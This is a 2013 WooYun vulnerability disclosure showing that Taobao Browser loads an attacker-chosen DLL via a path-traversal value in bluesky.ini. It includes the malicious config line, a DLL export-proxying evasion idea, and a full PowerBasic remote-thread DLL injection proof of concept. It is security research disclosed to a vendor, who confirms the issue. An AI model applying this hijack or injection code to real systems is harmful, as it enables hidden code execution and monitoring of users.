当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-025715

漏洞标题:淘宝浏览器3.0.2.604修改配置可能导致本地的DLL注入

相关厂商:淘宝网

漏洞作者: blast

提交时间:2013-06-12 09:33

修复时间:2013-09-10 09:33

公开时间:2013-09-10 09:33

漏洞类型:设计错误/逻辑缺陷

危害等级:低

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-06-12: 细节已通知厂商并且等待厂商处理中
2013-06-14: 厂商已经确认,细节仅向厂商公开
2013-06-17: 细节向第三方安全合作伙伴开放
2013-08-08: 细节向核心白帽子及相关领域专家公开
2013-08-18: 细节向普通白帽子公开
2013-08-28: 细节向实习白帽子公开
2013-09-10: 细节向公众公开

简要描述:

淘宝浏览器3.0.2.604(2013.3.20)修改配置文件可能导致本地的DLL注入

详细说明:

家里电脑上的,淘宝浏览器3.0.2.604(2013.3.20)版本,程序启动时会加载框架bluesky.dll,这个文件的路径,程序是通过bluesky.ini来确定的,所以修改配置文件:

\TaoBrowser\bluesky.ini


的内容为

[Common]
Version = ../../../../../../../../1111


即会让程序启动时加载(假设安装路径为c:\taobao\)c:\taobao\..\..\..\..\..\..\..\1111\bluesky.dll,也即c:\1111\bluesky.dll。
当然不局限于这一个DLL,因为覆盖了这个DLL之后,整个窗体就启动不了了。这个文件夹下面还有很多文件,通过检查与功能之间的关联,也可以通过覆盖某个DLL使得用户执行某个功能时触发恶意木马(例如更新功能的AliUpdate.dll)
假设bluesky.dll是恶意木马,那么用户打开淘宝浏览器之后,这个文件就会被浏览器加载,如果杀毒软件并没有它的定义的话,这儿杀毒软件默认是放行的(可能是因为白加黑,家里机器使用的是360杀毒,包括注入也没有提示).
DLL注入后将可以监视用户的动作,执行其它危险操作,etc...
漏洞的可能利用方法:配置文件的修改者可以是一个会1、释放文件,2、修改配置的木马。这两个动作都很接近正常程序的行为,所以一般不会达到触发杀毒软件主动防御的行为分值。
而伪造部分,例如想伪造的是Alixxx.dll,攻击者可以构造一个假的Alixxx.dll,输出表和Alixxx.dll一样,等浏览器调用假的Alixxx.dll时,由于真的也在那儿,假的Alixxx.dll可以调用真的Alixxx.dll的函数并把结果返回给浏览器,同时也可以执行自己的代码

漏洞证明:

dll被载入TAOBROWSER.EXE

QQ图片20130611231917.jpg


DLL提示的注入窗口:

QQ图片20130611231926.jpg


注入成功(-1=失败,0=成功):

1233.JPG


由于是老妈用的机器,所以没装什么编译程序,临时下了个POWERBASIC的程序,代码用的以前写的,所以功能简陋,只是为了测试一下:

#COMPILE DLL
#DIM ALL
%USEMACROS = 1
#INCLUDE "D:\PowerBasic\MAINDIR\WinAPI\Win32API.inc"
GLOBAL ghInstance AS DWORD
'-- INJECT.INC --------------------------------------------------------------
DECLARE FUNCTION Get_hModule(BYVAL PID AS DWORD, DllPath$) AS DWORD
DECLARE FUNCTION Inject_DLL(BYVAL PID AS DWORD, DllPath$) AS LONG
DECLARE FUNCTION Eject_DLL(BYVAL PID AS DWORD, BYVAL hModule AS DWORD) AS LONG
'-- Declares not found in WIN32API.INC
DECLARE FUNCTION EnumProcessModules LIB "PSAPI.DLL" ALIAS "EnumProcessModules" _
(BYVAL hProcess AS DWORD, hModule AS DWORD, _
BYVAL cb AS DWORD, cbNeeded AS DWORD) AS DWORD
DECLARE FUNCTION GetModuleFileNameEx LIB "PSAPI.DLL" ALIAS "GetModuleFileNameExA" _
(BYVAL hProcess AS DWORD, BYVAL hModule AS DWORD, _
Filename AS ASCIIZ, BYVAL nSize AS DWORD) AS DWORD
'====================
FUNCTION Get_hModule(BYVAL PID AS DWORD, DllPath$) AS DWORD
'-- Returns handle to running module specified in DllPath$, or zero if not found
'-- PID = process ID of running process; DllPath$ = path+filename of DLL
REGISTER i&, result&
LOCAL cb, cbNeeded, nModules AS LONG, hProcess, found, hModules() AS DWORD
LOCAL dll$, ModuleName AS ASCIIZ * %MAX_PATH
hProcess = OpenProcess(%PROCESS_QUERY_INFORMATION OR %PROCESS_VM_READ, %FALSE, PID)
IF hProcess THEN
cb = 100
DO
REDIM hModules(1 TO cb \ 4)
result = EnumProcessModules(hProcess, hModules(1), cb, cbNeeded)
IF result = 0 THEN 'call failed
cbNeeded = 0 : EXIT DO
END IF
IF cb > cbNeeded THEN EXIT DO
cb = cb * 2
LOOP
nModules = cbNeeded \ 4
DLL = UCASE$(DllPath$)
FOR i = 1 TO nModules
result = GetModuleFileNameEx(hProcess, hModules(i), _
ModuleName, SIZEOF(ModuleName))
IF result THEN
IF UCASE$(RTRIM$(ModuleName,$NUL)) = DLL THEN
found = hModules(i) : EXIT FOR
END IF
END IF
NEXT i
CloseHandle hProcess
END IF 'hProcess
FUNCTION = found
END FUNCTION
'====================
FUNCTION Inject_DLL(BYVAL PID AS DWORD, DllPath$) AS LONG
REGISTER hProcess&, hThread&
LOCAL ecode&, pLoadLibraryA, pRemoteBuffer AS DWORD
ecode = -1 'default to error
hProcess = OpenProcess(%PROCESS_CREATE_THREAD OR %PROCESS_QUERY_INFORMATION OR _
%PROCESS_VM_OPERATION OR %PROCESS_VM_READ OR _
%PROCESS_VM_WRITE, %FALSE, PID)
IF hProcess THEN
pLoadLibraryA = GetProcAddress(GetModuleHandle("Kernel32"), "LoadLibraryA")
pRemoteBuffer = VirtualAllocEx(hProcess, BYVAL %NULL, LEN(DllPath$), _
%MEM_COMMIT, %PAGE_READWRITE)
IF pRemoteBuffer AND pLoadLibraryA THEN
IF WriteProcessMemory(BYVAL hProcess, BYVAL pRemoteBuffer, _
BYVAL STRPTR(DllPath$), LEN(DllPath$), %NULL) THEN
hThread = CreateRemoteThread(BYVAL hProcess, BYVAL %NULL, 0&, _
BYVAL pLoadLibraryA, BYVAL pRemoteBuffer, _
0, %NULL)
IF hThread THEN
WaitForSingleObject hThread, %INFINITE
CloseHandle hThread
ecode = 0
END IF
END IF
VirtualFreeEx hProcess, pRemoteBuffer, 0, %MEM_RELEASE
END IF 'pRemoteBuffer AND pLoadLibraryA
CloseHandle hProcess
END IF 'hProcess
FUNCTION = ecode
END FUNCTION
'====================
FUNCTION Eject_DLL(BYVAL PID AS DWORD, BYVAL hModule AS DWORD) AS LONG
REGISTER hProcess&, hThread&
LOCAL ecode&, pFreeLibrary, pRemoteBuffer AS DWORD
ecode = -1 'default to error
hProcess = OpenProcess(%PROCESS_CREATE_THREAD OR %PROCESS_QUERY_INFORMATION OR _
%PROCESS_VM_OPERATION OR %PROCESS_VM_READ OR _
%PROCESS_VM_WRITE, %FALSE, PID)
IF hProcess THEN
pFreeLibrary = GetProcAddress(GetModuleHandle("Kernel32"), "FreeLibrary")
IF pFreeLibrary THEN
hThread = CreateRemoteThread(BYVAL hProcess, BYVAL %NULL, 0&, _
BYVAL pFreeLibrary, BYVAL hModule, 0, %NULL)
IF hThread THEN
WaitForSingleObject hThread, %INFINITE
CloseHandle hThread
ecode = 0
END IF
END IF
CloseHandle hProcess
END IF 'hProcess
FUNCTION = ecode
END FUNCTION
'-- END INJECT.INC ----------------------------------------------------------
FUNCTION LIBMAIN (BYVAL hInstance AS LONG, _
BYVAL fwdReason AS LONG, _
BYVAL lpvReserved AS LONG) AS LONG
DIM sFileName AS ASCIIZ * 256
DIM sModuleFilePath AS ASCIIZ * %MAX_PATH
DIM sNameCut AS ASCIIZ * %MAX_PATH

LOCAL ecode&, hmodule, pid AS DWORD
LOCAL DllPath$, exepath AS ASCIIZ * %MAX_PATH
GetModuleFileName GetModuleHandle(""), exepath, SIZEOF(exepath)
DllPath = "D:\PowerBasic\MAINDIR\t2.dll"
IF pid = 0 THEN pid = VAL(INPUTBOX$("Enter target process id", DllPath))
IF pid = 0 THEN EXIT FUNCTION
hModule = Get_hModule(pid, DllPath)
IF hModule THEN
MSGBOX "已被注入,尝试清除中",,DllPath
ecode = Eject_DLL(pid, hModule)
MSGBOX "Final eject ecode:" + STR$(ecode),,DllPath
ELSE
MSGBOX "未被注入,尝试注入中",,DllPath
ecode = Inject_DLL(pid, DllPath)
MSGBOX "Final inject ecode:" + STR$(ecode),,DllPath
END IF



' SELECT CASE fwdReason
' CASE %DLL_PROCESS_ATTACH
' ghInstance = hInstance
' FUNCTION = 1 'success!
GetModuleFileName(hInstance, sFileName, 255)
CALL GetModuleFileName( CDWD(&H0), sModuleFilePath, CDWD(%MAX_PATH) )
' sNameCut = Parse$( sModuleFilePath, "\", ParseCount(sModuleFilePath, "\") )
' sModuleFilePath = RTrim$( sModuleFilePath, sNameCut )
MSGBOX "The dll" + sFileName + " is being attached into : " + sModuleFilePath
'FUNCTION = 0 'failure! This will prevent the EXE from running.
' CASE %DLL_PROCESS_DETACH
' FUNCTION = 1 'success!
' CASE %DLL_THREAD_ATTACH
' FUNCTION = 1 'success!
' CASE %DLL_THREAD_DETACH
' FUNCTION = 1 'success!
' END SELECT
END FUNCTION


DLL以及设置

1333.JPG

修复方案:

过滤好../这种相对路径的字符

版权声明:转载请注明来源 blast@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2013-06-14 11:30

厂商回复:

感谢你对我们的支持与关注,该问题我们正在修复~ ^_^

最新状态:

暂无